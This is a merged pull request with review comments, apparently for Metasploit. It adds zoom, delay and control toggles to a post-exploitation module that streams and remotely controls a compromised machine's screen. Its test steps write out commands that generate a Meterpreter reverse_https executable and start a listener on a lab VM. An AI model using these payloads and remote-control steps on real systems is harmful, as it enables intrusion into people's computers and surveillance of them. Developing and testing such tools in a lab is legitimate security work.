### PR TITLE
Add controls to screen capture module

### PR DESCRIPTION
**Pull request by AlanFoster**
Builds on the work of @timwr's module landed in https://github.com/rapid7/metasploit-framework/pull/11967 to add additional toggles for the user.

## Before

- Screen capture module immediately starts controlling the target machine
- Fills the entire screen
- Refreshes frequently
- The browser communicates to metasploit using form data
- The browser loads the latest screenshot with images

## After

- Add toggle functionality for controlling the target
- Add Zoom in/out functionality to change screen size
- Add configurable delay between fetching the latest screenshot
- Add throttling for mouse/keyboard events
- The browser communicates to metasploit using JSON
- The browser fetches the the screenshot image, and renders with canvas
- Gracefully fails with an error message

## Example

capturescreen

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Gain access to a meterpreter session, i.e. a windows session on a vm
```
use windows/meterpreter/reverse_https
set LHOST vmnet8
set LPORT 4443
set SessionCommunicationTimeout 0
set ExitOnSession false
# Create the executable run on the VM
generate -o meterpreter -f exe
# Create listener
to_handler
```
- [ ] Now load the module:
```
use modules/post/multi/manage/screenshare
set SESSION -1
set SRVHOST vmnet8
run
```
- [x] **Verify** "zoom" functionality works
- [x] **Verify** controlling enables successfully, allowing, typing, clicking
- [x] **Verify** controlling disables successfully, allowing, typing, clicking

### CODE REVIEW

**Comment by bcoles** [comment]
LGTM. Zoom works. Image delay works. Taking control still works.

Tested on Windows 7 SP1 x64.

screenshare

**Comment by bcoles** [comment]
Keyboard event throttling appears to have some issues. Some keys are dropped when typing at a competent speed. But these issues probably already existed.

**Review by bcoles — APPROVED** [review]

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds some controls to the screenshare interface allowing size and delay customizations and a switch between controlling and non-controlling interface.

**Comment by timwr** [comment]
This is awesome!
I think the key drops can be fixed by using a synchronous websocket connection instead of async http requests to send the key and mouse events.

**Pull request merged**
